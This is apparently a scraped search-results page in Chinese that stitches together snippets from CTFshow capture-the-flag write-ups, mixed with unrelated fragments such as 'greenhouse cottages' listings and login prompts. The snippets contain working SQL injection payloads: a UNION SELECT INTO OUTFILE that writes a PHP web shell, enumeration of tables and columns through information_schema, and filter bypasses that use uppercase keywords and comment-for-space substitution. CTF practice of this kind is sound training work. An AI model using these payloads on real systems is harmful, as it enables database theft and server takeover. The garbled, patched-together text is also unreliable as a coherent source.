Webctfshow MISC 滑天下之大稽. 其他 2024-09-07 14:45:43 阅读次数: 0. 下载下来压缩包,得到一张未加密的图片,和加密的文本。. 把图片放到010或者winhex里面查看得到一串奇怪的字符. 然后复制下来去解密flag.txt. 就出来flag啦. 前言 下面几道无过滤的题都可以写入shell 然后蚁剑连上后从数据库里面找,就统一写下做法,后面不在具体复述。 具体做法如下 id=0' union select 1,"" into outfile "/var/www/html/1.php%23" 有的是查询的三项所以payload是 id=0' union select 1,2,"" into … See more 正常执行万能密码发现flag不在这个表中 按正常操作使用联合查询 id=1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()%23 得到两个表 ctfshow_user,ctfshow_user2 … See more 题目其实过滤了 select(不是替换成的空,应该是替换的其他的,否则是可以双写绕过的),但是只是过滤了小写的,所以使用大写可以绕过。 … See more 发现了一个bug 这个题正常让我们访问的网站是 /api/v3.php 但是我们访问/api然后传id可以不受过滤的限制(其实用的是171的源码) payload:i/api/?d=0' union select 1,password,3 from ctfshow_user3 %23 当然这个题的目的是想 … See more 题目过滤了空格,可以替换的方法有很多 payload1:id=0'/**/union/**/SELECT/**/password,2,3/**/from/**/ctfshow_user%23 payload2:id=0'union/**/SELECT(password),2,(3)from(ctfshow_user)%23有点画蛇添足 See more
CTFshow之命令执行web入门web30_哔哩哔哩_bilibili
WebOct 3, 2024 · 3.payload1' union select 1,2,column_name from information_schema.columns where table_name='ctfshow_user' --+获得列的名字. 4.payload1' union select … WebMar 22, 2024 · 获取验证码. 密码. 登录 greenhouse cottages of nwa
[Bucket CTF 2024]_石氏是时试的博客-CSDN博客
WebJan 16, 2024 · CTFshow内部赛_WPWebWeb1分析1www.zip源码泄露,代码审计,register.php中的黑名单限制较少,分析可得注册的用户名写入seesion,然后直接 … Webdocimg/ctfshow_docker. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository. master. Switch branches/tags. Branches … http://migooli.top/2024/10/05/ctfshow_web%E5%85%A5%E9%97%A8_%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/ greenhouse cottages of rison